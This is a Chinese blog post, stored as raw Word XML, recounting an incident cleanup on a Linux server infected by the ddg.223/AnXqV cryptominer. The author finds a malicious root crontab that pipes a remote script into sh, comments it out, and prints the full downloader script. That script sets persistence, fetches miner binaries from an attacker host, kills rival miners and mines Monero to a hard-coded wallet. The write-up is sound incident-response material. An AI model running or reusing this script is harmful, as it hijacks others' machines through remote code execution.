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C05" w:rsidRPr="00676C05" w:rsidRDefault="00676C05" w:rsidP="00676C05">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="150" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00676C05">
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
            <w:color w:val="000000"/>
            <w:kern w:val="36"/>
            <w:sz w:val="36"/>
            <w:szCs w:val="36"/>
          </w:rPr>
          <w:t>查杀病毒实战</w:t>
        </w:r>
        <w:r w:rsidRPr="00676C05">
          <w:rPr>
            <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Helvetica"/>
            <w:color w:val="000000"/>
            <w:kern w:val="36"/>
            <w:sz w:val="36"/>
            <w:szCs w:val="36"/>
          </w:rPr>
          <w:t>----------------</w:t>
        </w:r>
        <w:r w:rsidRPr="00676C05">
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
            <w:color w:val="000000"/>
            <w:kern w:val="36"/>
            <w:sz w:val="36"/>
            <w:szCs w:val="36"/>
          </w:rPr>
          <w:t>》</w:t>
        </w:r>
        <w:r w:rsidRPr="00676C05">
          <w:rPr>
            <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Helvetica"/>
            <w:color w:val="000000"/>
            <w:kern w:val="36"/>
            <w:sz w:val="36"/>
            <w:szCs w:val="36"/>
          </w:rPr>
          <w:t>ddg.223 and AnXQV</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00676C05">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00676C05" w:rsidRPr="00676C05" w:rsidRDefault="00676C05" w:rsidP="00676C05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  <w:r w:rsidRPr="00676C05">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00676C05" w:rsidRPr="00676C05" w:rsidRDefault="00676C05" w:rsidP="00676C05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  <w:r w:rsidRPr="00676C05">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">htop </w:t>
      </w:r>
      <w:r w:rsidRPr="00676C05">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发现导常</w:t>
      </w:r>
      <w:r w:rsidRPr="00676C0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676C05" w:rsidRPr="00676C05" w:rsidRDefault="00676C05" w:rsidP="00676C05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  <w:r w:rsidRPr="00676C05">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Helvetica"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="8849995" cy="1184910"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="6" name="Picture 6" descr="http://images2015.cnblogs.com/blog/940646/201703/940646-20170302001926813-1043731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40646/201703/940646-20170302001926813-10437317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05" w:rsidRPr="00676C05" w:rsidRDefault="00676C05" w:rsidP="00676C05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  <w:r w:rsidRPr="00676C05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接着发现可疑进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00676C05">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00676C05" w:rsidRPr="00676C05" w:rsidRDefault="00676C05" w:rsidP="00676C05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  <w:r w:rsidRPr="00676C05">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Helvetica"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="12555220" cy="914400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="Picture 5" descr="http://images2015.cnblogs.com/blog/940646/201703/940646-20170302002043345-992928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40646/201703/940646-20170302002043345-9929283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5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05" w:rsidRPr="00676C05" w:rsidRDefault="00676C05" w:rsidP="00676C05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  <w:r w:rsidRPr="00676C05">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>首先检测</w:t>
      </w:r>
      <w:r w:rsidRPr="00676C05">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>crontab,</w:t>
      </w:r>
      <w:r w:rsidRPr="00676C05">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发现问题</w:t>
      </w:r>
      <w:r w:rsidRPr="00676C0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# crontab -l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*/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5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* * * * curl -fsSL http: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//www.bdyutiudwj.com/i.sh?1 | sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00676C05" w:rsidRPr="00676C05" w:rsidRDefault="00676C05" w:rsidP="00676C05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  <w:r w:rsidRPr="00676C05">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>注释掉计划任务！！</w:t>
      </w:r>
      <w:r w:rsidRPr="00676C05">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>！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# crontab -l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#*/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5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* * * * curl -fsSL http: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//www.bdyutiudwj.com/i.sh?1 | sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00676C05" w:rsidRPr="00676C05" w:rsidRDefault="00676C05" w:rsidP="00676C05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  <w:r w:rsidRPr="00676C05">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>把把脚本下载下来</w:t>
      </w:r>
      <w:r w:rsidRPr="00676C05">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>: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http: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//www.bdyutiudwj.com/i.sh?1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00676C05" w:rsidRPr="00676C05" w:rsidRDefault="00676C05" w:rsidP="00676C05">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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  <w:r w:rsidRPr="00676C05">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>查看一下内容</w:t>
      </w:r>
      <w:r w:rsidRPr="00676C05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676C05" w:rsidRPr="00676C05" w:rsidRDefault="00676C05" w:rsidP="00676C05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676C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New!important" w:eastAsia="Times New Roman" w:hAnsi="Courier New!important" w:cs="Helvetica"/>
          <w:noProof/>
          <w:color w:val="008000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4" name="Picture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export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin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echo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"*/5 * * * * curl -fsSL http://www.bdyutiudwj.com/i.sh?1 | sh"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&gt; /</w:t>
      </w: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/spool/cron/root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mkdir -p /</w:t>
      </w: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/spool/cron/crontabs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echo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"*/5 * * * * curl -fsSL http://www.bdyutiudwj.com/i.sh?1 | sh"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&gt; /</w:t>
      </w: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/spool/cron/crontabs/root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[ ! -f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"/tmp/ddg.223"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]; then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curl -fsSL http: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//www.bdyutiudwj.com/ddg.$(uname -m) -o /tmp/ddg.223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fi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chmod +x /tmp/ddg.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223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&amp;&amp; /tmp/ddg.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223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CleanTail()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lastRenderedPageBreak/>
        <w:t>{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ps auxf|grep -v grep|grep /tmp/duckduckgo|awk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'{print $2}'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|xargs kill -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9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"/usr/bin/cron"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|awk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'{print $2}'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|xargs kill -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9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"/opt/cron"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|awk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'{print $2}'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|xargs kill -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9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"/usr/sbin/ntp"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|awk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'{print $2}'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|xargs kill -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9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"/opt/minerd"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|awk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'{print $2}'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|xargs kill -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9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"mine.moneropool.com"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|awk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'{print $2}'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|xargs kill -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9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"xmr.crypto-pool.fr:8080"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|awk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'{print $2}'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|xargs kill -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9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DoYam()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{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[ ! -f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"/tmp/AnXqV.yam"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]; then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curl -fsSL http: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//www.bdyutiudwj.com/yam -o /tmp/AnXqV.yam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fi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chmod +x /tmp/AnXqV.yam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/tmp/AnXqV.yam -c x -M stratum+tcp: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//44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM:x@xmr.crypto-pool.fr:443/xmr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DoMiner()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{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[ ! -f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"/tmp/AnXqV"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]; then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curl -fsSL http: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//www.bdyutiudwj.com/minerd -o /tmp/AnXqV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fi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chmod +x /tmp/AnXqV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/tmp/AnXqV -B -a cryptonight -o stratum+tcp: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//xmr.crypto-pool.fr:443 -u 44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM -p x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DoMinerNoAes()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{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if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[ ! -f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"/tmp/AnXqV.noaes"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]; then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curl -fsSL http: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//www.bdyutiudwj.com/minerd.noaes -o /tmp/AnXqV.noaes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fi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chmod +x /tmp/AnXqV.noaes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/tmp/AnXqV.noaes -B -a cryptonight -o stratum+tcp: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//xmr.crypto-pool.fr:443 -u 44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM -p x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"4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC"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|awk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'{print $2}'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|xargs kill -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9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"47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB"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|awk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'{print $2}'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|xargs kill -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9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"AnXqV"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|| DoMiner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"AnXqV"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|| DoYam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ps auxf|grep -v grep|grep </w:t>
      </w:r>
      <w:r w:rsidRPr="00676C05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"AnXqV"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|| DoMinerNoAes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00676C05" w:rsidRPr="00676C05" w:rsidRDefault="00676C05" w:rsidP="00676C05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676C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New!important" w:eastAsia="Times New Roman" w:hAnsi="Courier New!important" w:cs="Helvetica"/>
          <w:noProof/>
          <w:color w:val="008000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3" name="Picture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05" w:rsidRPr="00676C05" w:rsidRDefault="00676C05" w:rsidP="00676C05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676C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New!important" w:eastAsia="Times New Roman" w:hAnsi="Courier New!important" w:cs="Helvetica"/>
          <w:noProof/>
          <w:color w:val="008000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2" name="Picture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# tree /</w:t>
      </w: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/spool/cron/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lastRenderedPageBreak/>
        <w:t>/</w:t>
      </w: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/spool/cron/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├── crontabs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│   └── root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└── root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#</w:t>
      </w:r>
      <w:r w:rsidRPr="00676C05">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>查看内容并注掉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cat /</w:t>
      </w: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/spool/cron/root /</w:t>
      </w:r>
      <w:r w:rsidRPr="00676C05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var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/spool/cron/crontabs/root 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#*/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5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* * * * curl -fsSL http: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//www.bdyutiudwj.com/i.sh?1 | sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00676C05" w:rsidRPr="00676C05" w:rsidRDefault="00676C05" w:rsidP="00676C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>#*/</w:t>
      </w:r>
      <w:r w:rsidRPr="00676C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New!important" w:eastAsia="Times New Roman" w:hAnsi="Courier New!important" w:cs="Courier New"/>
          <w:color w:val="800080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00676C05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* * * * curl -fsSL http:</w:t>
      </w:r>
      <w:r w:rsidRPr="00676C05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//www.bdyutiudwj.com/i.sh?1 | sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00676C05" w:rsidRPr="00676C05" w:rsidRDefault="00676C05" w:rsidP="00676C05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676C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New!important" w:eastAsia="Times New Roman" w:hAnsi="Courier New!important" w:cs="Helvetica"/>
          <w:noProof/>
          <w:color w:val="008000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1" name="Picture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9C" w:rsidRPr="00676C05" w:rsidRDefault="00676C05" w:rsidP="00676C05">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676C05">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最后杀掉可疑进程，问题解</w:t>
      </w:r>
      <w:r w:rsidRPr="00676C05">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>决</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="008D749C" w:rsidRPr="00676C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6E"/>
    <w:rsid w:val="00676C05"/>
    <w:rsid w:val="00836D6E"/>
    <w:rsid w:val="008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324CD-6D22-4A56-A385-BF29041D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C05"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="36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6C05"/>
    <w:rPr>
      <w:strike w:val="0"/>
      <w:dstrike w:val="0"/>
      <w:color w:val="000000"/>
      <w:u w:val="none"/>
      <w:effect w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="cnblogscodecopy1">
    <w:name w:val="cnblogs_code_copy1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00676C05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08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68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569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43112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21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8249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364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3930892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884414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3495981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468416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5530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0609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7748581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6990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nblogs.com/bass6/p/6487253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maqiang</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>maqiang</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-03-15T07:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-03-15T07:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>